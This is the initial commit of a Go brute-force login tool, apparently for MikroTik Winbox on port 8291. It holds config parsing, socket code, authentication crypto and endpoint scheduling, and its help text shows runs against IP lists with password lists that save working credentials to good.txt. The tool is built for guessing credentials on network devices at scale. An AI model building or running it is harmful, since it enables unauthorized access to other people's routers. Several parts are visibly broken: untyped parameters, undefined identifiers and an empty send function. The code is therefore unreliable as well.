commit b76c6dda70ab5405478224e5edce24fc3d64e78b Author: dave Date: Thu Nov 17 23:28:16 2022 +0300 init diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b31c463 --- /dev/null +++ b/.gitignore @@ -0,0 +1,11 @@ +* + +!/.gitignore +!*.go +!go.sum +!go.mod + +!README.md +!LICENSE + +!*/ diff --git a/bigint.go b/bigint.go new file mode 100644 index 0000000..34bf2b8 --- /dev/null +++ b/bigint.go @@ -0,0 +1,139 @@ +package main + +import ( + "math/big" +) + +type bigint struct { + v *big.Int +} + +func (x bigint) Add(y bigint) bigint { + return bigint{v: new(big.Int).Add(x.v, y.v)} +} +func (x bigint) AddInt(y int) bigint { + return bigint{v: new(big.Int).Add(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Sub(y bigint) bigint { + return bigint{v: new(big.Int).Sub(x.v, y.v)} +} +func (x bigint) SubInt(y int) bigint { + return bigint{v: new(big.Int).Sub(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Mul(y bigint) bigint { + return bigint{v: new(big.Int).Mul(x.v, y.v)} +} +func (x bigint) MulInt(y int) bigint { + return bigint{v: new(big.Int).Mul(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Div(y bigint) bigint { + return bigint{v: new(big.Int).Div(x.v, y.v)} +} +func (x bigint) DivInt(y int) bigint { + return bigint{v: new(big.Int).Div(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Mod(y bigint) bigint { + return bigint{v: new(big.Int).Mod(x.v, y.v)} +} +func (x bigint) ModInt(y int) bigint { + return bigint{v: new(big.Int).Mod(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Pow(y bigint) bigint { + return bigint{v: new(big.Int).Exp(x.v, y.v, nil)} +} +func (x bigint) PowInt(y int) bigint { + return bigint{v: new(big.Int).Exp(x.v, big.NewInt(int64(y)), nil)} +} + +func (x bigint) And(y bigint) bigint { + return bigint{v: new(big.Int).And(x.v, y.v)} +} +func (x bigint) AndInt(y int) bigint { + return bigint{v: new(big.Int).And(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Neg() bigint { + return bigint{v: new(big.Int).Neg(x.v)} +} + +func (x bigint) Empty() bool { + return x.v == nil || x.v.Sign() == 0 +} + +func (x bigint) ModExp(y, m bigint) bigint { + return bigint{v: new(big.Int).Exp(x.v, y.v, m.v)} +} + +func (x bigint) Eq(y bigint) bool { + return x.v.Cmp(y.v) == 0 +} +func (x bigint) EqInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) == 0 +} + +func (x bigint) Ne(y bigint) bool { + return x.v.Cmp(y.v) != 0 +} +func (x bigint) NeInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) != 0 +} + +func (x bigint) Lt(y bigint) bool { + return x.v.Cmp(y.v) < 0 +} +func (x bigint) LtInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) < 0 +} + +func (x bigint) Gt(y bigint) bool { + return x.v.Cmp(y.v) > 0 +} +func (x bigint) GtInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) > 0 +} + +func (x bigint) Lte(y bigint) bool { + return x.v.Cmp(y.v) <= 0 +} +func (x bigint) LteInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) <= 0 +} + +func (x bigint) Gte(y bigint) bool { + return x.v.Cmp(y.v) >= 0 +} +func (x bigint) GteInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) >= 0 +} + +func (x bigint) ToBytes(n int) []byte { + res := make([]byte, n) + return x.v.FillBytes(res) +} + +func NewBigint(x int) bigint { + bi := bigint{} + bi.v = big.NewInt(int64(x)) + return bi +} + +func NewEmptyBigint() bigint { + return bigint{v: nil} +} + +func NewBigintFromString(s string, p int) bigint { + bi := bigint{} + bi.v, _ = new(big.Int).SetString(s, p) + return bi +} + +func NewBigintFromBytes(b []byte) bigint { + bi := bigint{} + bi.v = new(big.Int).SetBytes(b) + return bi +} diff --git a/config.go b/config.go new file mode 100644 index 0000000..0f3d20e --- /dev/null +++ b/config.go @@ -0,0 +1,343 @@ +package main + +import ( + "os" + "sort" + "strconv" + "strings" + "time" +) + +// ConfigParameterOptions represents additional options for a ConfigParameter. +type ConfigParameterOptions struct { + sw, hidden, command bool + callback func() +} + +// ConfigParameter represents a single configuration parameter. +type ConfigParameter struct { + name string // duplicated in configMap, but also saved here for convenience + value, def interface{} // value and default value + description string // description for this parameter + parsed bool // true if it was successfully parsed from commandline + opts ConfigParameterOptions +} + +var configMap map[string]ConfigParameter = make(map[string]ConfigParameter, 16) +var configAliasMap map[string]string = make(map[string]string, 4) + +var ConfigParsingFinished bool = false + +// registration + +func genericRegister(name string, def interface{}, description string, opts ConfigParameterOptions) { + name = strings.ToLower(name) + + _, ok := configMap[name] + failIf(ok, "cannot register config parameter (already exists): \"%v\"", name) + + _, ok = configAliasMap[name] + failIf(ok, "cannot register config parameter (already exists as an alias): \"%v\"", name) + + failIf(opts.command && opts.callback == nil, "\"%v\" is defined as a command but callback is missing", name) + + p := ConfigParameter{} + p.name = name + p.value = def + p.def = def + p.description = description + p.opts = opts + + configMap[name] = p +} + +func CfgRegister(name string, def interface{}, description string) { + genericRegister(name, def, description, ConfigParameterOptions{}) +} + +func CfgRegisterEx(name string, def interface{}, description string, options ConfigParameterOptions) { + genericRegister(name, def, description, options) +} + +func CfgRegisterCallback(name string, def interface{}, description string, callback func()) { + genericRegister(name, def, description, ConfigParameterOptions{callback: callback}) +} + +func CfgRegisterCommand(name string, description string, callback func()) { + genericRegister(name, false, description, ConfigParameterOptions{command: true, callback: callback}) +} + +func CfgRegisterSwitch(name string, description string) { + genericRegister(name, false, description, ConfigParameterOptions{sw: true}) +} + +func CfgRegisterHidden(name string, def interface{}) { + genericRegister(name, def, "", ConfigParameterOptions{hidden: true}) +} + +func CfgRegisterAlias(alias, target string) { + alias, target = strings.ToLower(alias), strings.ToLower(target) + + _, ok := configAliasMap[alias] + failIf(ok, "cannot register alias (already exists): \"%v\"", alias) + + _, ok = configMap[alias] + failIf(ok, "cannot register alias (already exists as a config parameter): \"%v\"", alias) + + _, ok = configMap[target] + failIf(!ok, "cannot register alias \"%v\": target \"%v\" does not exist", alias, target) + + configAliasMap[alias] = target +} + +// acquisition + +func CfgGet(name string) interface{} { + name = strings.ToLower(name) + parm, ok := configMap[name] + failIf(!ok, "unknown config parameter: \"%v\"", name) + + if parm.opts.sw { + return parm.parsed // switches always return true if they were parsed + } else if parm.parsed || parm.opts.hidden { + return parm.value // parsed and hidden parms return their current value + } else { + return parm.def // otherwise, use default value + } +} + +func CfgGetInt(name string) int { + return CfgGet(name).(int) +} + +func CfgGetFloat(name string) float64 { + return CfgGet(name).(float64) +} + +func CfgGetIntSlice(name string) []int { + return CfgGet(name).([]int) +} + +func CfgGetBool(name string) bool { + return CfgGet(name).(bool) +} + +func CfgGetSwitch(name string) bool { + return CfgGet(name).(bool) +} + +func CfgGetString(name string) string { + return CfgGet(name).(string) +} + +func CfgGetStringSlice(name string) []string { + return CfgGet(name).([]string) +} + +func CfgGetDurationMS(name string) time.Duration { + tm := CfgGet(name).(int) + failIf(tm < -1, "\"%v\" can only be set to -1 or a positive value", name) + if tm == -1 { + tm = 0 + } + + return time.Duration(tm) * time.Millisecond +} + +// setting + +func CfgSet(name string, value interface{}) { + name = strings.ToLower(name) + parm, ok := configMap[name] + failIf(!ok, "unknown config parameter: \"%v\"", name) + failIf(!parm.opts.hidden, "tried to set \"%v\", but it is not a hidden parameter", name) + + parm.value = value + if parm.opts.callback != nil { + parm.opts.callback() + } + + configMap[name] = parm +} + +// parsing + +// getCmdlineParm returns a trimmed commandline parameter with specified index. +func getCmdlineParm(i int) string { + return strings.TrimSpace(os.Args[i]) +} + +// isSlice checks if a ConfigParameter value is a slice. +func (parm *ConfigParameter) isSlice() bool { + switch parm.value.(type) { + case []int, []uint, []string: + return true + default: + return false + } +} + +// writeParmValue saves raw commandline value into a ConfigParameter. +func (parm *ConfigParameter) writeParmValue(value string) { + var err error + + switch parm.value.(type) { + case bool: + parm.value, err = strconv.ParseBool(value) + failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) + case int: + v, err := strconv.ParseInt(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) + parm.value = int(v) + case uint: + v, err := strconv.ParseUint(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) + parm.value = uint(v) + case string: + parm.value = value + case []bool: + b, err := strconv.ParseBool(value) + failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) + parm.value = append(parm.value.([]bool), b) + case []int: + i, err := strconv.ParseInt(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) + parm.value = append(parm.value.([]int), int(i)) + case []uint: + u, err := strconv.ParseUint(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) + parm.value = append(parm.value.([]uint), uint(u)) + case []string: + parm.value = append(parm.value.([]string), value) + default: + fail("unknown config parameter \"%v\" type: %T", parm.name, parm.value) + } +} + +// finalizeParm marks a ConfigParameter as parsed, adds it to a global config map +// and calls its callback, if one is present. +func (parm *ConfigParameter) finalizeParm() { + parm.parsed = true + configMap[parm.name] = *parm + + if parm.opts.callback != nil { + parm.opts.callback() + } + + log("cfg", 2, "parse: %T \"%v\" -> def %v, now %v", parm.value, parm.name, parm.def, parm.value) +} + +func parseAppConfig() { + log("cfg", 1, "parsing config") + + totalFinalized := 0 + + for i := 1; i < len(os.Args); i++ { + arg := getCmdlineParm(i) + if len(arg) == 0 { + continue + } + + failIf(arg[0] != '-', "\"%v\" is not a commandline parameter", arg) + arg = strings.TrimPrefix(arg, "-") + arg = strings.TrimPrefix(arg, "-") + + failIf(len(arg) == 0, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) + + parm, ok := configMap[strings.ToLower(arg)] + if !ok { + alias, ok := configAliasMap[strings.ToLower(arg)] + failIf(!ok, "unknown commandline parameter: \"%v\"", arg) + + parm, ok = configMap[alias] + failIf(!ok, "alias \"%v\" references unknown commandline parameter", arg) + + log("cfg", 3, "\"%v\" is aliased to \"%v\"", alias, parm.name) + } + + failIf(parm.opts.hidden, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) + failIf(parm.parsed && !parm.isSlice(), "multiple occurrences of commandline parameter \"%v\" are not allowed", parm.name) + + if !parm.opts.command { + if parm.opts.sw { + parm.writeParmValue("true") + } else { + i++ + parm.writeParmValue(getCmdlineParm(i)) + } + } + + finalizeParm(&parm) + totalFinalized++ + } + + log("cfg", 1, "parsed %v commandline parameters", totalFinalized) + ConfigParsingFinished = true +} + +func showHelp() { + log("", 0, "options:") + + parms := make([]string, 0, len(configMap)) + for key := range configMap { + parms = append(parms, key) + } + sort.Strings(parms) + + for _, parmName := range parms { + parm := configMap[parmName] + + if parm.opts.hidden { + continue + } + + header := "-" + parm.name + if len(parm.name) > 1 { + header = "-" + header + } + + aliases := []string{} + for alias, target := range configAliasMap { + if target == parm.name { + if len(alias) == 1 { + aliases = append(aliases, "-"+alias) + } else { + aliases = append(aliases, "--"+alias) + } + break + } + } + + if len(aliases) > 0 { + sort.Strings(aliases) + header = header + " (aliases: " + strings.Join(aliases, ", ") + ")" + } + + header = header + ":" + description := " (description missing)" + if parm.description != "" { + description = " " + parm.description + } + + if parm.opts.command || parm.opts.sw { + log("", 0, "%s\n%s", header, description) + } else { + log("", 0, "%s\n%s\n default: %v", header, description, parm.value) + } + } + + log("", 0, "") + log("", 0, "examples:") + log("", 0, " single target:") + log("", 0, " ./mtbf --ip 127.0.0.1 --port 8291 --login admin --password 12345678 --out-file good.txt") + log("", 0, " multiple targets with multiple passwords:") + log("", 0, " ./mtbf --ip-list ips.txt --port 8291 --login admin --password-list passwords.txt --out-file good.txt") + + os.Exit(0) +} + +func init() { + CfgRegisterCommand("help", "show program usage", showHelp) + CfgRegisterAlias("?", "help") + CfgRegisterAlias("h", "help") +} diff --git a/conn.go b/conn.go new file mode 100644 index 0000000..c7d9352 --- /dev/null +++ b/conn.go @@ -0,0 +1,51 @@ +package main + +import ( + "net" + "time" +) + +// Connection represents a network socket. +type Connection struct { + dialer net.Dialer + socket net.Conn + connectTimeout time.Duration + readTimeout time.Duration + protocol string +} + +// NewConnection creates a Connection object. +func NewConnection() *Connection { + conn := Connection{} + conn.connectTimeout = CfgGetDurationMS("connect-timeout-ms") + conn.readTimeout = CfgGetDurationMS("read-timeout-ms") + conn.protocol = "tcp" + return &conn +} + +// Connect initiates a connection to an Endpoint. +func (conn *Connection) Connect(endpoint *Endpoint) (err error) { + conn.dialer = net.Dialer{Timeout: conn.connectTimeout, KeepAlive: -1} + conn.socket, err = conn.dialer.Dial(conn.protocol, endpoint.String()) + if err != nil { + log("conn", 2, "cannot connect to \"%v\": %v", endpoint, err.Error()) + } + + return err +} + +// SetConnectTimeout sets a custom connect timeout on a Connection. +func (conn *Connection) SetConnectTimeout(timeout time.Duration) { + conn.connectTimeout = timeout +} + +// SetReadTimeout sets a custom read timeout on a Connection. +func (conn *Connection) SetReadTimeout(timeout time.Duration) { + conn.readTimeout = timeout +} + +// Send writes data to a Connection. +func (conn *Connection) Send(data []byte) { + conn.socket.SetReadDeadline(time.Now().Add(conn.readTimeout)) + +} diff --git a/crypt.go b/crypt.go new file mode 100644 index 0000000..1f95d7b --- /dev/null +++ b/crypt.go @@ -0,0 +1,103 @@ +package main + +import ( + "crypto/hmac" + cryptoRand "crypto/rand" + "crypto/sha1" + "crypto/sha256" + mathRand "math/rand" + "strings" +) + +func getSHA1Digest(data []byte) []byte { + array := sha1.Sum(data) + return array[:] +} + +func getSHA2Digest(data []byte) []byte { + array := sha256.Sum256(data) + return array[:] +} + +func HKDF(data []byte) []byte { + h := hmac.New(sha1.New, []byte(strings.Repeat("\x00", 64))) + h.Write(data) + h1 := h.Sum(nil) + h2 := make([]byte, 0) + res := make([]byte, 0) + + for i := 0; i < 2; i++ { + h = hmac.New(sha1.New, h1) + h.Write(h2) + h.Write([]byte{byte(i) + 1}) + h2 = h.Sum(nil) + res = append(res, h2...) + } + + return res[:0x24] +} + +func genStreamKeys(server bool, data []byte) (sendAESKey, sendHMACKey, receiveAESKey, receiveHMACKey []byte) { + const magic2 = "On the client side, this is the send key; on the server side, it is the receive key." + const magic3 = "On the client side, this is the receive key; on the server side, it is the send key." + + var txEnc, rxEnc []byte + + txEnc = append(data, []byte(strings.Repeat("\x00", 40))...) + rxEnc = append(data, []byte(strings.Repeat("\x00", 40))...) + + if server { + txEnc = append(txEnc, magic3...) + rxEnc = append(rxEnc, magic2...) + } else { + txEnc = append(txEnc, magic2...) + rxEnc = append(rxEnc, magic3...) + } + + txEnc = append(txEnc, []byte(strings.Repeat("\xF2", 40))...) + rxEnc = append(rxEnc, []byte(strings.Repeat("\xF2", 40))...) + + txEnc = getSHA1Digest(txEnc)[:16] + rxEnc = getSHA1Digest(rxEnc)[:16] + + sendKey := HKDF(txEnc) + sendAESKey = sendKey[:16] + sendHMACKey = sendKey[16:] + + receiveKey := HKDF(rxEnc) + receiveAESKey = receiveKey[:16] + receiveHMACKey = receiveKey[16:] + + return sendAESKey, sendHMACKey, receiveAESKey, receiveHMACKey +} + +func genPasswordValidatorPriv(username, password string, salt []byte) []byte { + if len(salt) != 16 { + panic("salt must be 16 bytes") + } + + hash := getSHA2Digest([]byte(username + ":" + password)) + return getSHA2Digest(append(salt, hash...)) +} + +func genRandomBytes(n int) ([]byte, error) { + b := make([]byte, n) + + var err error + if CfgGetSwitch("crypt-predictable-rng") { + _, err = mathRand.Read(b) + } else { + _, err = cryptoRand.Read(b) + } + + if err != nil { + return nil, err + } + + return b, nil +} + +func init() { + CfgRegisterSwitch("crypt-predictable-rng", "disable secure rng and use a pseudorandom preseeded rng") + mathRand.Seed(300) +} diff --git a/curve.go b/curve.go new file mode 100644 index 0000000..ecac5b6 --- /dev/null +++ b/curve.go @@ -0,0 +1,103 @@ +package main + +type WCurve struct { + p, r, a, b, h bigint + g *JacobiPoint + montA, conversionFromM bigint + conversion bigint +} + +func NewWCurve() *WCurve { + curve := WCurve{} + + curve.p = NewBigintFromString("7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffed", 16) + curve.r = NewBigintFromString("1000000000000000000000000000000014def9dea2f79cd65812631a5cf5d3ed", 16) + curve.montA = NewBigintFromString("486662", 10) + curve.a = NewBigintFromString("2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa984914a144", 16) + curve.b = NewBigintFromString("7b425ed097b425ed097b425ed097b425ed097b425ed097b4260b5e9c7710c864", 16) + curve.h = NewBigintFromString("8", 10) + + curve.conversionFromM = curve.montA.Mul(modinv(NewBigint(3), curve.p)).Mod(curve.p) + curve.conversion = curve.p.Sub(curve.montA.Mul(modinv(NewBigint(3), curve.p))).Mod(curve.p) + curve.g = curve.liftX(NewBigint(9), false) + return &curve +} + +func (curve *WCurve) Eq(other *WCurve) bool { + return curve.p.Eq(other.p) && + curve.a.Mod(curve.p).Eq(other.a.Mod(curve.p)) && + curve.b.Mod(curve.p).Eq(other.b.Mod(curve.p)) +} + +func (curve *WCurve) containsPoint(x, y bigint) bool { + p1 := x.Mul(x).Add(curve.a).Mul(x).Add(curve.b) + return y.Mul(y).Sub(p1).Mod(curve.p).EqInt(0) +} + +func (curve *WCurve) genPublicKey(priv []byte) (pub []byte, parity bool) { + if len(priv) != 32 { + panic("invalid private key length") + } + + p := NewBigintFromBytes(priv) + pt := curve.g.Mul(p) + return curve.toMontgomery(pt) +} + +func (self *WCurve) toMontgomery(pt *JacobiPoint) (bytes []byte, parity bool) { + x := pt.AffineX().Add(self.conversion).Mod(self.p) + return x.ToBytes(32), pt.AffineY().AndInt(1).EqInt(1) +} + +func (self *WCurve) liftX(x bigint, parity bool) *JacobiPoint { + x = x.Mod(self.p) + ySquared := x.Mul(x).Mul(x).Add(self.montA.Mul(x).Mul(x).Add(x)).Mod(self.p) + x = x.Add(self.conversionFromM).Mod(self.p) + ys0, ys1 := primeModSqrt(ySquared, self.p) + if ys0.Empty() && ys1.Empty() { + return nil + } else { + pt1 := NewJacobiPoint(self, x, ys0, NewBigint(1), self.r) + pt2 := NewJacobiPoint(self, x, ys1, NewBigint(1), self.r) + + if pt1.AffineY().AndInt(1).EqInt(1) && parity { + return pt1 + } else if pt2.AffineY().AndInt(1).EqInt(1) && parity { + return pt2 + } else if pt1.AffineY().AndInt(1).EqInt(0) && !parity { + return pt1 + } else { + return pt2 + } + } +} + +func (self *WCurve) redp1(bytes []byte, parity bool) *JacobiPoint { + x := getSHA2Digest(bytes) + for { + x2 := getSHA2Digest(x) + pt := self.liftX(NewBigintFromBytes(x2), parity) + if pt == nil { + x = NewBigintFromBytes(x).AddInt(1).ToBytes(32) + } else { + return pt + } + } +} + +func (self *WCurve) check(a *JacobiPoint) bool { + ax := a.AffineX() + ay := a.AffineY() + + left := ay.Mul(ay).Mod(self.p) + right := ax.Mul(ax).Mul(ax).Add(self.a.Mul(ax)).Add(self.b).Mod(self.p) + return left.Eq(right) +} + +func (self *WCurve) multiplyByG(a bigint) *JacobiPoint { + return self.g.Mul(a) +} + +func (self *WCurve) finiteFieldValue(a bigint) bigint { + return a.Mod(self.r) +} diff --git a/endpoint.go b/endpoint.go new file mode 100644 index 0000000..9a16963 --- /dev/null +++ b/endpoint.go @@ -0,0 +1,587 @@ +package main + +import ( + "container/list" + "errors" + "net" + "strconv" + "strings" + "sync" + "time" +) + +type Address struct { + ip string // TODO: switch to a static 16-byte array + port int + v6 bool +} + +type Endpoint struct { + addr Address + + loginPos SourcePos + passwordPos SourcePos + + delayUntil time.Time + + normalList *list.Element + delayedList *list.Element + + goodConn int + badConn int + consecutiveGoodConn int + consecutiveBadConn int + protoErrors int + consecutiveProtoErrors int + readErrors int + consecutiveReadErrors int + + mutex sync.Mutex + + deleted bool // set to TRUE to mark this endpoint as deleted + + // unused, for now + rtt float32 + heuristicBanAPS int + heuristicBanPPS int + lastPacketAt time.Time // when was the last packet sent? + lastAttemptAt time.Time // same, but for attempts +} + +var endpoints *list.List // Contains all active endpoints +var delayedEndpoints *list.List // Contains endpoints that got delayed + +// A mutex for synchronizing Endpoint collections. +var globalEndpointMutex sync.Mutex + + +// String transforms an Endpoint to a string representation compatible with Dialer interface. +func (e *Endpoint) String() string { + if e.addr.v6 { + return "[" + e.addr.ip + "]:" + strconv.Itoa(e.addr.port) + } else { + return e.addr.ip + ":" + strconv.Itoa(e.addr.port) + } +} + + +// Delete deletes an endpoint from global storage. +// This method assumes that Endpoint's mutex was already taken. +func (e *Endpoint) Delete() { + globalEndpointMutex.Lock() + defer globalEndpointMutex.Unlock() + + e.delayUntil = time.Time{} + + if e.delayedList != nil { + log("ep", 3, "deleting delayed endpoint \"%v\"", e) + delayedEndpoints.Remove(e.delayedList) + e.delayedList = nil + } + + if e.normalList != nil { + log("ep", 3, "deleting endpoint \"%v\"", e) + endpoints.Remove(e.normalList) + e.normalList = nil + } + + e.deleted = true +} + +// Delay marks an Endpoint as "delayed" with the specified time duration +// and causes it to move to the delayed queue. +// This method assumes that Endpoint's mutex was already taken. +func (e *Endpoint) Delay(addTime time.Duration) { + if e.deleted { + return + } + + log("ep", 5, "delaying endpoint \"%v\" for %v", e, addTime) + e.delayUntil = time.Now().Add(addTime) + e.MigrateToDelayed() +} + +// MigrateToDelayed moves an Endpoint to a delayed queue. +// Endpoint mutex is assumed to be taken. +func (e *Endpoint) MigrateToDelayed() { + endpointMutex.Lock() + defer endpointMutex.Unlock() + + if e.delayedList != nil { + // already in a delayed list + log("ep", 5, "cannot migrate endpoint \"%v\" to delayed list: already in the list", e) + } else { + log("ep", 5, "migrating endpoint \"%v\" to delayed list", e) + e.delayedList = delayedEndpoints.PushBack(e) + if e.normalList != nil { + endpoints.Remove(e.normalList) + e.normalList = nil + } + } +} + +// MigrateToNormal moves an Endpoint to a normal queue. +// Endpoint mutex is assumed to be taken. +func (e *Endpoint) MigrateToNormal() { + endpointMutex.Lock() + defer endpointMutex.Unlock() + + if e.normalList != nil { + log("ep", 5, "cannot migrate endpoint \"%v\" to normal list: already in the list", e) + } else { + log("ep", 5, "migrating endpoint \"%v\" to normal list", e) + e.normalList = endpoints.PushBack(e) + if e.delayedList != nil { + delayedEndpoints.Remove(e.delayedList) + e.delayedList = nil + } + } +} + +// SkipLogin gets the endpoint's current login, +// compares it with user-defined login and skips (advances) it if +// both logins are equal. +func (e *Endpoint) SkipLogin(login) { + // attempt to fetch next login + curLogin, empty := SrcLogin.FetchOne(&e.loginPos, false) + if curLogin == login && !empty { // this login has not yet been exhausted? + // reset password pos + e.passwordPos.Reset() + + // fetch but ignore result + SrcLogin.FetchOne(&e.loginPos, true) + + log("ep", 3, "advanced to next login for \"%v\"", e) + } +} + +// NoResponse is an event handler that gets called when +// an Endpoint does not respond to a connection request. +func (e *Endpoint) NoResponse() bool { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.badConn++ + if e.consecutiveGoodConn == 0 { + e.consecutiveBadConn++ + } else { + e.consecutiveGoodConn = 0 + e.consecutiveBadConn = 1 + } + + // 1. always bail after X consecutive bad conns + if e.consecutiveBadConn >= CfgGetInt("max-bad-conn") { + log("ep", 3, "deleting \"%v\" due to max-bad-conn", e) + e.Delete() + return false + } + + // 2. after a good conn, always allow at most X bad conns + if e.goodConn > 0 && e.consecutiveBadConn <= CfgGetInt("max-bad-after-good-conn") { + log("ep", 3, "keeping \"%v\" around due to max-bad-after-good-conn", e) + e.Delay(CfgGetDurationMS("no-response-delay-ms")) + return true + } + + // 3. always allow at most X bad conns + if e.consecutiveBadConn < CfgGetInt("min-bad-conn") { + log("ep", 3, "keeping \"%v\" around due to min-bad-conn", e) + e.Delay(CfgGetDurationMS("no-response-delay-ms")) + return true + } + + // 4. bad conn/good conn ratio must not be higher than X + if e.goodConn > 0 && (float64(e.badConn)/float64(e.goodConn)) <= CfgGetFloat("conn-ratio") { + log("ep", 3, "keeping \"%v\" around due to conn-ratio", e) + e.Delay(CfgGetDurationMS("no-response-delay-ms")) + return true + } + + // otherwise, just delete it + log("ep", 3, "deleting \"%v\" due to no applicable grace conditions", e) + e.Delete() + return false +} + +// ProtocolError is an event handler that gets called when +// an Endpoint responds with wrong or missing data. +func (e *Endpoint) ProtocolError() bool { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.protoErrors++ + e.consecutiveProtoErrors++ + + // 1. always bail after X consecutive protocol errors + if e.consecutiveProtoErrors >= CfgGetInt("max-proto-errors") { + log("ep", 3, "deleting \"%v\" due to max-proto-errors", e) + e.Delete() + return false + } + + // 2. always allow at most X consecutive protocol errors + if e.consecutiveProtoErrors < CfgGetInt("min-proto-errors") { + log("ep", 3, "keeping \"%v\" around due to min-proto-errors", e) + e.Delay(CfgGetDurationMS("protocol-error-delay-ms")) + return true + } + + // 3. bad conn/good conn ratio must not be higher than X + if e.goodConn > 0 && (float64(e.protoErrors)/float64(e.goodConn)) <= CfgGetFloat("proto-error-ratio") { + log("ep", 3, "keeping \"%v\" around due to proto-error-ratio", e) + e.Delay(CfgGetDurationMS("protocol-error-delay-ms")) + return true + } + + // otherwise, just delete it + log("ep", 3, "deleting \"%v\" due to no applicable grace conditions", e) + e.Delete() + return false +} + +// Bad is an event handler that gets called when +// an authentication attempt to an Endpoint fails. +func (e *Endpoint) Bad() { + e.mutex.Lock() + defer e.mutex.Unlock() + e.consecutiveProtoErrors = 0 + + // The endpoint may be in delayed queue, so push it back to the normal queue. + e.MigrateToNormal() +} + +// Good is an event handler that gets called when +// an authentication attempt to an Endpoint succeeds. +func (e *Endpoint) Good(login) { + e.mutex.Lock() + defer e.mutex.Unlock() + e.consecutiveProtoErrors = 0 + + if !CfgGetSwitch("keep-endpoint-on-good") { + e.Delete() + } else { + e.MigrateToNormal() + e.SkipLogin(login) + } +} + +// Connected is an event handler that gets called when +// a connection attempt to an Endpoint succeeds. +func (e *Endpoint) Connected() { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.goodConn++ + if e.consecutiveBadConn == 0 { + e.consecutiveGoodConn++ + } else { + e.consecutiveBadConn = 0 + e.consecutiveGoodConn = 1 + } +} + +// NoSuchLogin is an event handler that gets called when +// a service module determines that a login does not present +// on an Endpoint and therefore can be excluded from processing. +func (e *Endpoint) NoSuchLogin(login string) { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.SkipLogin(login) +} + +// EventWithParm tells an Endpoint that something important has happened, +// or a hint has been acquired. +// It is normally called from a Task handler. +// Returns False if an event resulted in a deletion of its Endpoint. +func (e *Endpoint) EventWithParm(event TaskEvent, parm any) bool { + log("ep", 4, "endpoint event for \"%v\": %v", e, event) + + if event == TE_Generic { + return true // do not process generic events + } + + switch event { + case TE_NoResponse: + return e.NoResponse() + + case TE_ProtocolError: + return e.ProtocolError() + + case TE_Good: + e.Good(parm.(string)) + return false + + case TE_Bad: + e.Bad() + case TN_Connected: + e.Connected() + case TH_NoSuchLogin: + e.NoSuchLogin(parm.(string)) + } + + return true // keep this endpoint +} + +// Event is a parameterless version of EventWithParm. +func (e *Endpoint) Event(event TaskEvent) bool { + return e.EventWithParm(event, 0) +} + +// Exhausted gets called when an endpoint no longer has any valid logins and passwords, +// thus it may be deleted. +func (e *Endpoint) Exhausted() { + e.mutex.Lock() + defer e.mutex.Unlock() + e.Delete() +} + +// GetDelayedEndpoint retrieves an Endpoint from the delayed list. +func GetDelayedEndpoint() (e *Endpoint, waitTime time.Duration) { + currentTime := time.Now() + + if delayedEndpoints.Empty() { + log("ep", 5, "delayed endpoint list is empty") + return nil, 0 + } + + it := delayedEndpoints.IteratorAt(delayedEndpoints.Left()) + for { + k, v := it.Key().(time.Time), it.Value().(*Endpoint) + + if v == nil { + log("ep", 5, "!!! empty delayed endpoint!!!") + return nil, 0 + } + + if k.After(currentTime) { + log("ep", 5, "no delayed endpoints can be processed at this time") + return nil, k.Sub(currentTime) + } + + if k.Before(v.delayUntil) { + log("ep", 5, "delayed endpoint was re-delayed: removing lingering definition") + defer delayedEndpoints.Remove(k) + it.Next() + continue + } + + if v.delayUntil.IsZero() { + log("ep", 5, "delayed endpoint is already in normal queue: removing lingering definition") + defer delayedEndpoints.Remove(k) + it.Next() + continue + } + + defer delayedEndpoints.Remove(k) + return v, 0 + } + + log("ep", 5, "delayed endpoint list was holding only lingering definitions and is now empty") + return nil, 0 +} + +// FetchEndpoint retrieves an endpoint: first, a delayed RB tree is queried, +// then, if nothing is found, a normal list is searched, +// and (TODO) if this list is empty or will soon be emptied, +// a new batch of endpoints gets created. +func FetchEndpoint() (e *Endpoint, waitTime time.Duration) { + endpointMutex.Lock() + defer endpointMutex.Unlock() + + e, waitTime = GetDelayedEndpoint() + if e != nil { + log("ep", 4, "fetched a delayed endpoint: \"%v\"", e) + return e, 0 + } + + el := endpoints.Front() + if el == nil { + if waitTime == 0 { + log("ep", 1, "out of endpoints") + return nil, 0 + } + + log("ep", 4, "all endpoints are delayed, waiting for %v", waitTime) + return nil, waitTime + } + + endpoints.MoveToBack(el) + e = el.Value.(*Endpoint) + + log("ep", 4, "fetched an endpoint: \"%v\"", e) + return e, 0 +} + +// Safety feature, to avoid expanding subnets into a huge amount of IPs. +const maxNetmaskSize = 22 // expands into /10 for IPv4 + +// RegisterEndpoint builds an Endpoint and puts it to a global list of endpoints. +func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int { + for _, port := range ports { + ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}} + ep.loginPos.Reset() + ep.passwordPos.Reset() + + ep.listElement = endpoints.PushBack(&ep) + log("ep", 3, "ok registered: %v", &ep) + } + + return 